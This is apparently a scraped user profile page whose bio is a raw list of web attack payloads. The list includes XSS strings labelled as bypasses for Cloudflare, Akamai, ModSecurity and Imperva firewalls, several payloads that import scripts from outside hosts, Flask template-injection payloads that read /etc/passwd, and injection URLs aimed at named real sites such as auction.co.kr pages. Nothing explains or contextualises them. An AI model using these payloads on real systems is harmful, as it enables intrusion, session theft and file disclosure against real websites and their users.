https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload cat+/etc/passwd &lt;svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"&gt;&lt;defs&gt;&lt;font id="x"&gt;&lt;font-face font-family="y"/&gt;&lt;/font&gt;&lt;/defs&gt;&lt;/svg&gt; 𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 &lt;img src=x onError=import('//1152848220/')&gt; &lt;img src=x onError=import('//3627734734/')&gt; http://3627734734 teste"&gt;&lt;javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash&gt;/*click me!#*/alert(document.domain) teste"&gt;&lt;javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash&gt;/*click me!#*/confirm`1` testtest&lt;a%20href="javascript&amp;colon;alert(document.domain)"&gt;testtest 𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 &lt;x onauxclick=import('//1152848220/')&gt;click 𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 &lt;x onauxclick=import('//1152848220/')&gt;click &lt;img src=x onError=import('//1152848220/')&gt; &lt;uu src=@'@' onbigclick=import('//0a"&amp;nbsp;"0a0a?0a/')&gt;mou%09se&lt;|/uu&gt;:} &lt;svg/OnLoad="`${prompt``}`"&gt; Imperva Waf XSS ByPass : &lt;sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//&lt;/div"&gt; &lt;svg onload="alert(1)" &lt;="" svg="" https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://github.com/cure53/H5SC/tree/master/attachments https://130.211.16.246/www/EasyToBuy/ShareOfVoice?retailer='-onfocus=alert(document.domain)-' https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceRetailerData?retailer= https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceProductsData?category=&amp;header=Top%205%20Competitors&amp;label='-confirm(1)-' ?a=`+alert(document.domain);//&amp;x=%22oncut=%22eval(%27`%27%2bURL)' Python Flask SSTI Payloads and tricks * {{url_for.__globals__}} * {{request.environ}} * {{config}} *`{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}` * {{self}} * request|attr('__class__') == request.__class__ == request[\x5f\x5fclass\x5f\x5f] &lt;img src="x" onerror="document.write(window.location)" /&gt; &lt;img src="echopwn" onerror="document.write('&lt;iframe src=file:///etc/passwd&gt;&lt;/iframe&gt;')"/&gt; https://memberssl.auction.co.kr/Common/CustomizedVerification/VerifyIdentityByCellphone.aspx?nrequestseq=132421452&amp;calltype=U&amp;nexturl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx%26RequestSeqNo%3diac132421452%26callPageType%3dU%26certType%3dZ&amp;cancelurl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx&amp;refertype=&amp;ispossiblecreditauth=Y https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&amp;ctype=U&amp;next=javascript:confirm(1);// https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&amp;ctype=U&amp;next=https%3a%2f%2fmemberssl.auction.co.kr%2fCommon%2fVerifyMainResult.aspx%3freferType%3d%26url%3djavascript:confirm(1);// </div>
  '"/&gt;&lt;img/src=` onerror=alert('name')&gt; mail'"/&gt;&lt;img/src=` onerror=alert('name')&gt;
This user hasn't Starred any content yet.
This user doesn't have any Apps yet.
This user doesn't have any Extensions yet.
This user doesn't have Articles yet.

Ready to Get Started?

No payment info required.
Start Now   Contact Sales